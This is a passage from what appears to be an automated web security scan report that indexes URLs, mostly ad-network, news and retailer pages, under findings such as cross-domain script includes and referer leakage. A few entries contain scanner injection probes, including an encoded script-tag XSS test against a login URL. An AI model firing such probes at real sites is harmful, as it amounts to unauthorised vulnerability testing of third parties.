11.275. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.276. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.277. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.278. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.279. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.280. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.281. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.282. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.283. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.284. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.285. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.286. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.287. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.288. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.289. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.290. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.291. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.292. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.293. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.294. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.295. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.296. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.297. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

11.298. http://rover.ebay.com/ar/1/76417/4

11.299. http://rover.ebay.com/ar/1/76418/4

11.300. http://rp.gwallet.com/r1/ucm

11.301. http://rs.gwallet.com/r1/pixel/x113

11.302. http://rs.gwallet.com/r1/pixel/x9r8101111

11.303. http://rs.gwallet.com/r1/pixel/x9r8962146

11.304. http://rt.legolas-media.com/lgrt

11.305. http://sales.liveperson.net/hc/55601019/

11.306. http://sales.liveperson.net/hc/55601019/

11.307. http://sales.liveperson.net/hc/55601019/

11.308. http://sales.liveperson.net/hc/57386690/

11.309. http://sales.liveperson.net/hc/57386690/

11.310. http://segment-pixel.invitemedia.com/pixel

11.311. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

11.312. http://services.krxd.net/geoip

11.313. http://services.krxd.net/pixel.gif

11.314. http://spotlight.creditcards.com/www/delivery/ajs.php

11.315. http://spotlight.creditcards.com/www/delivery/lg.php

11.316. http://sync.mathtag.com/sync

11.317. http://t2.trackalyzer.com/trackalyze.asp

11.318. http://tacoda.at.atwola.com/rtx/r.gif

11.319. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

11.320. http://tags.bluekai.com/site/2831

11.321. http://tags.bluekai.com/site/2939

11.322. http://tags.bluekai.com/site/3561

11.323. http://tags.bluekai.com/site/38

11.324. http://tags.bluekai.com/site/3834

11.325. http://tags.bluekai.com/site/450

11.326. http://tap.rubiconproject.com/oz/feeds/targus/profile

11.327. http://tap.rubiconproject.com/oz/sensor

11.328. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

11.329. http://va.px.invitemedia.com/pixel

11.330. http://va.px.invitemedia.com/set_partner_uid

11.331. http://view.c3metrics.com/c3VTabstrct-6-2.php

11.332. http://www.bizographics.com/collect/

11.333. http://www.burstnet.com/enlightn/7644//AC95/

11.334. http://www.capitalone.com/creditcards/gateway/

11.335. http://www.cnbc.com/

11.336. http://www.cnbc.com/id/32372321

11.337. http://www.cnbc.com/id/43422860

11.338. http://www.cnbc.com/redirect.aspx

11.339. http://www.creditcards.com/css/credit-cards-print.css

11.340. http://www.creditcards.com/css/credit-cards.css

11.341. http://www.creditcards.com/images/404-footer-security-lock.gif

11.342. http://www.creditcards.com/images/Best-Credit-Cards.gif

11.343. http://www.creditcards.com/images/Credit-Cards-Compare.gif

11.344. http://www.creditcards.com/images/Credit-Cards-Instant-Approval.gif

11.345. http://www.creditcards.com/images/Credit-Cards-Search.gif

11.346. http://www.creditcards.com/images/accept-credit-cards.gif

11.347. http://www.creditcards.com/images/apply-credit-cards.gif

11.348. http://www.creditcards.com/images/apply-now.gif

11.349. http://www.creditcards.com/images/bank-credit-cards.gif

11.350. http://www.creditcards.com/images/blue-bg.gif

11.351. http://www.creditcards.com/images/cccom_logo_114x44.gif

11.352. http://www.creditcards.com/images/credit-card-news-and-advice.gif

11.353. http://www.creditcards.com/images/credit-card-offer-amex.gif

11.354. http://www.creditcards.com/images/credit-card-offer-discover.gif

11.355. http://www.creditcards.com/images/credit-card-offer-mastercard.gif

11.356. http://www.creditcards.com/images/credit-card-offer-visa.gif

11.357. http://www.creditcards.com/images/credit-card-offers.gif

11.358. http://www.creditcards.com/images/credit-card-tools.gif

11.359. http://www.creditcards.com/images/credit-cards-logo-2.gif

11.360. http://www.creditcards.com/images/fb-icon.png

11.361. http://www.creditcards.com/images/loading.gif

11.362. http://www.creditcards.com/images/menu.gif

11.363. http://www.creditcards.com/images/new-loading.gif

11.364. http://www.creditcards.com/images/rss-icon.png

11.365. http://www.creditcards.com/images/search-by-credit-quality.gif

11.366. http://www.creditcards.com/images/security-lock-dark.gif

11.367. http://www.creditcards.com/images/security-lock-light.gif

11.368. http://www.creditcards.com/images/spacer_light_blue.gif

11.369. http://www.creditcards.com/images/truste-seal-ctv.gif

11.370. http://www.creditcards.com/images/twtr-icon.png

11.371. http://www.creditcards.com/images/yt-icon.png

11.372. http://www.creditcards.com/javascript/application.js

11.373. http://www.creditcards.com/javascript/bluekai.js

11.374. http://www.creditcards.com/javascript/mvt/tooltip.js

11.375. http://www.creditcards.com/javascript/s_code.js

11.376. http://www.creditcards.com/javascript/thickbox/jquery.js

11.377. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.css

11.378. http://www.creditcards.com/javascript/thickbox/mvt/interstitial.js

11.379. http://www.creditcards.com/javascript/thickbox/mvt/jquery.js

11.380. http://www.creditcards.com/javascript/thickbox/thickbox.css

11.381. http://www.creditcards.com/javascript/thickbox/thickbox.js

11.382. http://www.creditcards.com/javascript/tynt.js

11.383. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

11.384. http://www.creditcards.com/oc/Netsparker3643bc898af148cda9073d161734fcbb/

11.385. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

11.386. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

11.387. http://www.creditcards.com/sb.php

11.388. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png

11.389. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif

11.390. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

11.391. http://www.wtp101.com/admeld_sync

12. Password field with autocomplete enabled

12.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

12.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

12.3. http://online.wsj.com/home-page

12.4. http://soundcloud.com/

12.5. http://soundcloud.com/help

12.6. http://soundcloud.com/help/premium-accounts

12.7. http://soundcloud.com/premium

12.8. https://soundcloud.com/login

12.9. https://soundcloud.com/login

12.10. https://soundcloud.com/login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

13. Source code disclosure

14. Referer-dependent response

14.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

14.2. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

14.3. http://adnxs.revsci.net/imp

14.4. http://api-cdn.cnbc.com/api/chart/chart.asp

14.5. http://api.bizographics.com/v1/profile.json

14.6. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/

14.7. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/

14.8. http://pixel.adsafeprotected.com/jspix

14.9. http://view.c3metrics.com/c3VTabstrct-6-2.php

14.10. http://www.facebook.com/plugins/like.php

14.11. http://www.facebook.com/plugins/recommendations.php

14.12. http://www.facebook.com/widgets/recommendations.php

15. Cross-domain Referer leakage

15.1. http://a.rfihub.com/sed

15.2. http://a.tribalfusion.com/j.ad

15.3. http://a.tribalfusion.com/j.ad

15.4. http://a1.sndcdn.com/javascripts/base.js

15.5. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

15.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

15.7. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

15.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

15.9. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4

15.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

15.13. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.14. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.15. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.16. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.17. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

15.18. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

15.19. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.20. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.21. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.22. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.23. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

15.24. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow

15.25. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

15.26. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6

15.27. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

15.28. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

15.29. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.30. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.31. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us

15.32. http://ad.doubleclick.net/adj/nbcu.cnbc/search

15.33. http://admeld.adnxs.com/usersync

15.34. http://ads.bluelithium.com/st

15.35. http://afe.specificclick.net/serve/v=5

15.36. http://afe.specificclick.net/serve/v=5

15.37. http://cas.criteo.com/delivery/afr.php

15.38. http://clickserve.cc-dt.com/link/click

15.39. http://clickserve.cc-dt.com/link/click

15.40. http://clickserve.cc-dt.com/link/click

15.41. http://clickserve.cc-dt.com/link/click

15.42. http://clickserve.cc-dt.com/link/tplclick

15.43. http://cm.g.doubleclick.net/pixel

15.44. http://cm.g.doubleclick.net/pixel

15.45. http://cm.g.doubleclick.net/pixel

15.46. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

15.47. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm

15.48. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

15.49. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm

15.50. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

15.51. http://fls.doubleclick.net/activityi

15.52. http://gan.doubleclick.net/gan_click

15.53. http://gan.doubleclick.net/gan_click

15.54. http://gan.doubleclick.net/gan_click

15.55. http://gan.doubleclick.net/gan_click

15.56. http://gan.doubleclick.net/gan_click

15.57. http://gan.doubleclick.net/gan_click

15.58. http://gan.doubleclick.net/gan_click

15.59. http://gan.doubleclick.net/gan_click

15.60. http://gan.doubleclick.net/gan_impression

15.61. http://ib.adnxs.com/ptj

15.62. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js

15.63. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js

15.64. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

15.65. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

15.66. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html

15.67. http://optimized-by.rubiconproject.com/a/dk.html

15.68. http://pbid.pro-market.net/engine

15.69. http://pixel.invitemedia.com/admeld_sync

15.70. http://pixel.invitemedia.com/admeld_sync

15.71. http://platform.twitter.com/widgets/follow_button.html

15.72. http://reviews.homedepot.com/1999q/202642971/reviews.htm

15.73. http://reviews.homedepot.com/1999s/202642971/reviews.htm

15.74. http://rs.gwallet.com/r1/pixel/x113

15.75. http://search.cnbc.com/main.do

15.76. https://services.wsj.com/Gryphon/jsp/retentionController.jsp

15.77. https://soundcloud.com/login

15.78. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.79. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.80. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.81. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.83. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.84. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.85. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

15.86. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.87. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.88. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

15.89. http://tags.bluekai.com/site/2939

15.90. http://tags.bluekai.com/site/2939

15.91. http://tags.bluekai.com/site/2939

15.92. http://tags.bluekai.com/site/2939

15.93. http://ticker.cnbc.com/scripts/cnbc_ticker.js

15.94. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/

15.95. http://www.cnbc.com/js/cnbc_quote_components.js

15.96. http://www.creditcards.com/oc/

15.97. http://www.facebook.com/plugins/like.php

15.98. http://www.facebook.com/plugins/like.php

15.99. http://www.facebook.com/plugins/recommendations.php

15.100. http://www.facebook.com/plugins/recommendations.php

15.101. http://www.facebook.com/plugins/recommendations.php

15.102. http://www.facebook.com/plugins/recommendations.php

15.103. http://www.facebook.com/widgets/recommendations.php

15.104. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

15.105. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

15.106. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

15.107. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

15.108. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

15.109. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js

15.110. http://www.nutter.com/attorneys.php

16. Cross-domain script include

16.1. http://a.rfihub.com/sed

16.2. http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

16.3. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

16.4. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

16.5. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

16.6. http://afe.specificclick.net/serve/v=5

16.7. http://afe.specificclick.net/serve/v=5

16.8. http://cas.criteo.com/delivery/afr.php

16.9. http://cdn5.tribalfusion.com/media/1956006/frame.html

16.10. http://cdn5.tribalfusion.com/media/2516896//frm.html

16.11. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

16.12. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

16.13. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

16.14. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

16.15. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

16.16. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1873985195@x15

16.17. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

16.18. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1046746257@Top1

16.19. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

16.20. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

16.21. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

16.22. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1397195672@Top1

16.23. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

16.24. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1520590272@Top1

16.25. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1737549536@Top1

16.26. http://online.wsj.com/home-page

16.27. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.28. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.29. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.30. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.31. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.32. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.33. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.34. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.35. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.36. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.37. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.38. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.39. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.40. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.41. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.42. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.43. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.44. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.45. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.46. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.47. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.48. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.49. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.50. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.51. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

